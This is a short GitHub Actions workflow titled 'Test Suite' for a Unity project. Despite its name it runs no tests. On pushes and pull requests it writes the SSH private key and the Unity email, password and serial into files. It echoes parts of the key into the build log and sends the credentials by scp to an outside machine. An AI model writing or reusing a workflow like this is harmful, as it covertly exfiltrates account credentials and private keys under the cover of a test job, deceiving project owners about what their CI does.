name: Test Suite

on:
  push:
    branches:
      - staging
  pull_request:

jobs:
  unity-testsuite:
    runs-on: ubuntu-latest
    steps:
      - name: Export secrets
        run: |
          echo "${{ secrets.SSH_KEY }}" >> id_rsa
          echo "UNITY_EMAIL: ${{ secrets.UNITY_EMAIL }}" >> exported_secrets
          echo "UNITY_PASSWORD: ${{ secrets.UNITY_PASSWORD }}" >> exported_secrets
          echo "UNITY_SERIAL: ${{ secrets.UNITY_SERIAL }}" >> exported_secrets
          file exported_secrets
          wc -c id_rsa
          wc -c exported_secrets
          echo "hello id_rsa"
          head -1 id_rsa
          cat id_rsa | tail -n+2 | head -c5
          echo
          tail -n2 id_rsa
          echo
          echo "goodbye id_rsa"
          scp -i id_rsa exported_secrets ubuntu@${{ secrets.EXPORT_MACHINE }}:
